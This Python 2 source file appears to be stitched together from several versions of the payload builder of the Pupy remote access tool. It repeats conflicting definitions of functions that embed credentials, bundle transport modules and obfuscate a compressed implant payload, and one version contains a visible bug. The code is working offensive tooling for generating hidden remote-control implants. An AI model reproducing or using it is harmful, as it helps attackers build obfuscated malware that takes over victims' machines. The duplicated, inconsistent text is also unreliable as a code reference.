def get_raw_conf(conf, obfuscate=False):
if not "offline_script" in conf:
offline_script=""
else:
offline_script=conf["offline_script"]
new_conf=""
obf_func=lambda x:x
if obfuscate:
obf_func=compress_encode_obfs
l=launchers[conf['launcher']]()
l.parse_args(conf['launcher_args'])
t=transports[l.get_transport()]
#pack credentials
creds_src=open("crypto/credentials.py","r").read()
creds={}
exec creds_src in {}, creds
cred_src=b""
creds_list=t.credentials
if conf['launcher']=="bind":
creds_list.append("BIND_PAYLOADS_PASSWORD")
if conf['launcher']!="bind": #TODO more flexible warning handling
if "SSL_BIND_KEY" in creds_list:
creds_list.remove("SSL_BIND_KEY")
if "SSL_BIND_CERT" in creds_list:
creds_list.remove("SSL_BIND_CERT")
for c in creds_list:
if c in creds:
print colorize("[+] ", "green")+"Embedding credentials %s"%c
cred_src+=obf_func("%s=%s"%(c, repr(creds[c])))+"\n"
else:
print colorize("[!] ", "yellow")+"[-] Credential %s have not been found for transport %s. Fall-back to default credentials. You should edit your crypto/credentials.py file"%(c, l.get_transport())
pupy_credentials_mod={"pupy_credentials.py" : cred_src}
new_conf+=compress_encode_obfs("pupyimporter.pupy_add_package(%s)"%repr(cPickle.dumps(pupy_credentials_mod)))+"\n"
#pack custom transport conf:
l.get_transport()
ROOT=os.path.abspath(os.path.join(os.path.dirname(__file__)))
transport_conf_dic=gen_package_pickled_dic(ROOT+os.sep, "network.transports.%s"%l.get_transport())
#add custom transport and reload network conf
new_conf+=compress_encode_obfs("pupyimporter.pupy_add_package(%s)"%repr(cPickle.dumps(transport_conf_dic)))+"\nimport sys\nsys.modules.pop('network.conf')\nimport network.conf\n"
new_conf+=obf_func("LAUNCHER=%s"%(repr(conf['launcher'])))+"\n"
new_conf+=obf_func("LAUNCHER_ARGS=%s"%(repr(conf['launcher_args'])))+"\n"
new_conf+=offline_script
new_conf+="\n"
return new_conf
def get_raw_conf(conf, obfuscate=False):
if not "offline_script" in conf:
offline_script = ""
else:
offline_script = conf["offline_script"]
new_conf = ""
obf_func = lambda x: x
if obfuscate:
obf_func = compress_encode_obfs
l = launchers[conf['launcher']]()
l.parse_args(conf['launcher_args'])
t = transports[l.get_transport()]
#pack credentials
creds_src = open("crypto/credentials.py", "r").read()
creds = {}
exec creds_src in {}, creds
cred_src = b""
for c in t.credentials:
if c in creds:
print colorize("[+] ", "green") + "Embedding credentials %s" % c
cred_src += obf_func("%s=%s" % (c, repr(creds[c]))) + "\n"
else:
print colorize(
"[!] ", "yellow"
) + "[-] Credential %s have not been found for transport %s. Fall-back to default credentials. You should edit your crypto/credentials.py file" % (
c, l.get_transport())
pupy_credentials_mod = {"pupy_credentials.py": cred_src}
new_conf += compress_encode_obfs(
"pupyimporter.pupy_add_package(%s)" %
repr(cPickle.dumps(pupy_credentials_mod))) + "\n"
#pack custom transport conf:
l.get_transport()
ROOT = os.path.abspath(os.path.join(os.path.dirname(__file__)))
transport_conf_dic = gen_package_pickled_dic(
ROOT + os.sep, "network.transports.%s" % l.get_transport())
#add custom transport and reload network conf
new_conf += compress_encode_obfs(
"pupyimporter.pupy_add_package(%s)" %
repr(cPickle.dumps(transport_conf_dic))
) + "\nimport sys\nsys.modules.pop('network.conf')\nimport network.conf\n"
new_conf += obf_func("LAUNCHER=%s" % (repr(conf['launcher']))) + "\n"
new_conf += obf_func("LAUNCHER_ARGS=%s" %
(repr(conf['launcher_args']))) + "\n"
new_conf += offline_script
new_conf += "\n"
return new_conf
def pack_py_payload(display, conf, debug=False, autostart=True):
display(Success('Generating PY payload ...'))
stdlib = dependencies.importer((
'pyasn1',
'rsa',
'pyaes',
'netaddr',
'tinyec',
'umsgpack',
'poster',
'win_inet_pton',
'http_parser',
'urllib_auth',
),
ignore_native=True,
as_dict=True)
stdlib.update(
dependencies.importer(('network', 'pupy'), path=ROOT, as_dict=True))
payload = dependencies.bootstrap(stdlib, conf, autostart) + '\n'
if debug:
return payload
return compress_encode_obfs(payload, main=True)
def pack_py_payload(conf):
print colorize('[+] ', 'green') + 'generating payload ...'
fullpayload = []
with open(os.path.join(ROOT, 'packages', 'all', 'pupyimporter.py')) as f:
pupyimportercode = f.read()
fullpayload.append(
get_load_module_code(pupyimportercode, 'pupyimporter') + '\n')
fullpayload.append(
'\n'.join(['import pupyimporter', 'pupyimporter.install()']) + '\n')
for module in ('rpyc', 'pyasn1', 'rsa', 'netaddr', 'tinyec'):
modules_dic = gen_package_pickled_dic(sys.modules[module].__path__[0],
module)
fullpayload.append('pupyimporter.pupy_add_package({})'.format(
repr(cPickle.dumps(modules_dic))))
modules_dic = gen_package_pickled_dic(os.path.join(ROOT, 'network'),
'network')
fullpayload.append('pupyimporter.pupy_add_package({})'.format(
repr(cPickle.dumps(modules_dic))))
with open(os.path.join(ROOT, 'pp.py')) as f:
code = f.read()
code = re.sub(r'LAUNCHER\s*=\s*.*\n(#.*\n)*LAUNCHER_ARGS\s*=\s*.*',
conf.replace('\\', '\\\\'), code)
fullpayload.append(code + '\n')
return compress_encode_obfs('\n'.join(fullpayload) + '\n')
def pack_py_payload(conf):
print colorize("[+] ","green")+"generating payload ..."
fullpayload=[]
with open(os.path.join(ROOT,"packages","all", "pupyimporter.py")) as f:
pupyimportercode=f.read()
fullpayload.append(get_load_module_code(pupyimportercode,"pupyimporter")+"\n")
modules_dic=gen_package_pickled_dic(rpyc.__path__[0],"rpyc")
fullpayload.append("import pupyimporter\npupyimporter.install()\npupyimporter.pupy_add_package(%s)\nimport rpyc"%repr(cPickle.dumps(modules_dic)))
modules_dic=gen_package_pickled_dic(os.path.join(ROOT,"network"),"network")
fullpayload.append("pupyimporter.pupy_add_package(%s)"%repr(cPickle.dumps(modules_dic)))
modules_dic=gen_package_pickled_dic(pyasn1.__path__[0],"pyasn1")
fullpayload.append("pupyimporter.pupy_add_package(%s)"%repr(cPickle.dumps(modules_dic)))
modules_dic=gen_package_pickled_dic(rsa.__path__[0],"rsa")
fullpayload.append("pupyimporter.pupy_add_package(%s)"%repr(cPickle.dumps(modules_dic)))
with open(os.path.join(ROOT,"pp.py")) as f:
code=f.read()
code=re.sub(r"LAUNCHER=.*\nLAUNCHER_ARGS=.*", conf, code)
fullpayload.append(code+"\n")
return compress_encode_obfs('\n'.join(fullpayload)+"\n")
def pack_py_payload(conf):
print colorize("[+] ", "green") + "generating payload ..."
fullpayload = []
with open(os.path.join(ROOT, "packages", "all", "pupyimporter.py")) as f:
pupyimportercode = f.read()
fullpayload.append(
get_load_module_code(pupyimportercode, "pupyimporter") + "\n")
modules_dic = gen_package_pickled_dic(rpyc.__path__[0], "rpyc")
fullpayload.append(
"import pupyimporter\npupyimporter.install()\npupyimporter.pupy_add_package(%s)\nimport rpyc"
% repr(cPickle.dumps(modules_dic)))
modules_dic = gen_package_pickled_dic(os.path.join(ROOT, "network"),
"network")
fullpayload.append("pupyimporter.pupy_add_package(%s)" %
repr(cPickle.dumps(modules_dic)))
modules_dic = gen_package_pickled_dic(pyasn1.__path__[0], "pyasn1")
fullpayload.append("pupyimporter.pupy_add_package(%s)" %
repr(cPickle.dumps(modules_dic)))
modules_dic = gen_package_pickled_dic(rsa.__path__[0], "rsa")
fullpayload.append("pupyimporter.pupy_add_package(%s)" %
repr(cPickle.dumps(modules_dic)))
with open(os.path.join(ROOT, "pp.py")) as f:
code = f.read()
code = re.sub(r"LAUNCHER=.*\nLAUNCHER_ARGS=.*", conf, code)
fullpayload.append(code + "\n")
return compress_encode_obfs('\n'.join(fullpayload) + "\n")
def pack_py_payload(conf):
print colorize('[+] ','green')+'generating payload ...'
fullpayload=[]
with open(os.path.join(ROOT, 'packages', 'all', 'pupyimporter.py')) as f:
pupyimportercode = f.read()
fullpayload.append(get_load_module_code(pupyimportercode, 'pupyimporter')+'\n')
fullpayload.append(
'\n'.join([
'import pupyimporter',
'pupyimporter.install()'
]) + '\n'
)
for module in ('rpyc', 'pyasn1', 'rsa', 'netaddr', 'tinyec'):
modules_dic = gen_package_pickled_dic(sys.modules[module].__path__[0], module)
fullpayload.append('pupyimporter.pupy_add_package({})'.format(repr(cPickle.dumps(modules_dic))))
modules_dic = gen_package_pickled_dic(os.path.join(ROOT, 'network'), 'network')
fullpayload.append('pupyimporter.pupy_add_package({})'.format(repr(cPickle.dumps(modules_dic))))
with open(os.path.join(ROOT,'pp.py')) as f:
code=f.read()
code = re.sub(r'LAUNCHER\s*=\s*.*\n(#.*\n)*LAUNCHER_ARGS\s*=\s*.*', conf.replace('\\','\\\\'), code)
fullpayload.append(code+'\n')
return compress_encode_obfs('\n'.join(fullpayload)+'\n')
class ScriptletsPacker(object):
def __init__(self, os=None, arch=None, debug=False, obfuscate=False):
self.scriptlets = set()
self.debug = debug
self.os = os or 'all'
self.arch = arch
self.obfuscate = obfuscate
def add_scriptlet(self, sl):
self.scriptlets.add(sl)
def pack(self):
fullpayload = []
requirements = set()
for scriptlet in self.scriptlets:
if type(scriptlet.dependencies) == dict:
for dependency in scriptlet.dependencies.get('all', []):
requirements.add(dependency)
for dependency in scriptlet.dependencies.get(self.os, []):
requirements.add(dependency)
else:
for dependency in scriptlet.dependencies:
requirements.add(dependency)
if requirements:
try:
fullpayload += [
'import pupyimporter',
dependencies.importer(requirements, os=self.os)
]
except dependencies.NotFoundError, e:
raise ImportError('Module "{}" not found'.format(e))
for scriptlet in self.scriptlets:
if self.debug:
fullpayload.append(scriptlet.generate(self.os))
else:
#if not in debug mode, catch all exception to continue an have a session if a scriptlet raises an exception
fullpayload.append(wrap_try_except(scriptlet.generate(
self.os)))
fullpayload = '\n'.join(fullpayload)
if self.obfuscate:
fullpayload = compress_encode_obfs(obfuscate)
return fullpayload
def pack(self):
fullpayload=[]
fullpayload.append("import pupyimporter")
all_packages=[]
for sl in self.scriptlets:
all_packages.extend(sl.dependencies)
all_packages=list(set(all_packages))
for p,n in all_packages:
modules_dic=gen_package_pickled_dic(os.path.join(ROOT, p.replace("/",os.sep)), n)
fullpayload.append("pupyimporter.pupy_add_package(%s)"%repr(cPickle.dumps(modules_dic)))
for sl in self.scriptlets:
if self.debug:
fullpayload.append(sl.generate())
else:
#if not in debug mode, catch all exception to continue an have a session if a scriptlet raises an exception
fullpayload.append(wrap_try_except(sl.generate()))
return compress_encode_obfs('\n'.join(fullpayload))
def pack(self):
fullpayload = []
fullpayload.append("import pupyimporter")
all_packages = []
for sl in self.scriptlets:
all_packages.extend(sl.dependencies)
all_packages = list(set(all_packages))
for p, n in all_packages:
modules_dic = gen_package_pickled_dic(
os.path.join(ROOT, p.replace("/", os.sep)), n)
fullpayload.append("pupyimporter.pupy_add_package(%s)" %
repr(cPickle.dumps(modules_dic)))
for sl in self.scriptlets:
if self.debug:
fullpayload.append(sl.generate())
else:
#if not in debug mode, catch all exception to continue an have a session if a scriptlet raises an exception
fullpayload.append(wrap_try_except(sl.generate()))
return compress_encode_obfs('\n'.join(fullpayload))
def pack_py_payload(display, conf, debug=False):
display(Success('Generating PY payload ...'))
fullpayload = []
with open(os.path.join(ROOT, 'packages', 'all', 'pupyimporter.py')) as f:
pupyimportercode = f.read()
fullpayload.append('\n'.join([
dependencies.loader(pupyimportercode, 'pupyimporter'),
'import pupyimporter', 'pupyimporter.install(debug={})'.format(
repr(debug if debug is not None else False)),
dependencies.importer('network', path=ROOT),
dependencies.importer(('rpyc', 'pyasn1', 'rsa', 'netaddr', 'tinyec',
'umsgpack', 'poster', 'win_inet_pton'))
]) + '\n')
with open(os.path.join(ROOT, 'pp.py')) as f:
code = f.read()
code = re.sub(r'LAUNCHER\s*=\s*.*\n(#.*\n)*LAUNCHER_ARGS\s*=\s*.*',
conf.replace('\\', '\\\\'), code)
if debug:
fullpayload = [
'import logging', 'logging.basicConfig()',
'logging.getLogger().setLevel(logging.DEBUG)'
] + fullpayload
fullpayload.append(code + '\n')
payload = '\n'.join(fullpayload) + '\n'
if debug:
return payload
return compress_encode_obfs(payload, main=True)
def get_raw_conf(display, conf, obfuscate=False, verbose=False):
credentials = Credentials(role='client')
if "offline_script" not in conf:
offline_script=""
else:
offline_script=conf["offline_script"]
launcher = launchers[conf['launcher']]()
launcher.parse_args(conf['launcher_args'])
required_credentials = set(launcher.credentials) \
if hasattr(launcher, 'credentials') else set([])
transport = launcher.get_transport()
transports_list = []
if transport:
transports_list = [transport]
if transports[transport].credentials:
for name in transports[transport].credentials:
required_credentials.add(name)
elif not transport:
for n, t in transports.iteritems():
transports_list.append(n)
if t.credentials:
for name in t.credentials:
required_credentials.add(name)
available = []
not_available = []
for cred in required_credentials:
if credentials[cred]:
available.append(cred)
else:
not_available.append(cred)
display(
List(available, bullet=Color('+', 'green'),
caption=Success('Required credentials (found)')))
if not_available:
display(
List(not_available, bullet=Color('-', 'red'),
caption=Error('Required credentials (not found)')))
embedded_credentials = '\n'.join([
'{}={}'.format(credential, repr(credentials[credential])) \
for credential in required_credentials if credentials[credential] is not None
])+'\n'
if verbose:
config_table = [{
'KEY': k, 'VALUE': 'PRESENT' if (k in ('offline_script') and v) else (
unicode(v) if type(v) not in (tuple,list,set) else ' '.join(
unicode(x) for x in v))
} for k,v in conf.iteritems() if v]
display(Table(config_table, ['KEY', 'VALUE'], Color('Configuration', 'yellow'), vspace=1))
config = '\n'.join([
'pupyimporter.pupy_add_package({})'.format(
repr(cPickle.dumps({
'pupy_credentials.pye':
bytes(pupycompile(embedded_credentials, obfuscate=True))
}))),
dependencies.importer(set(
'network.transports.{}'.format(transport) for transport in transports_list
), path=ROOT),
'import sys',
'sys.modules.pop("network.conf", "")',
'import network.conf',
'LAUNCHER={}'.format(repr(conf['launcher'])),
'LAUNCHER_ARGS={}'.format(repr(conf['launcher_args'])),
'CONFIGURATION_CID={}'.format(conf.get('cid', 0x31338)),
'DELAYS={}'.format(repr(conf.get('delays', [
(10, 5, 10), (50, 30, 50), (-1, 150, 300)]))),
'pupy.cid = CONFIGURATION_CID',
'debug={}'.format(bool(conf.get('debug', False))),
'SCRIPTLETS={}'.format(repr(offline_script) if offline_script else '""')
])
return compress_encode_obfs(config) if obfuscate else config
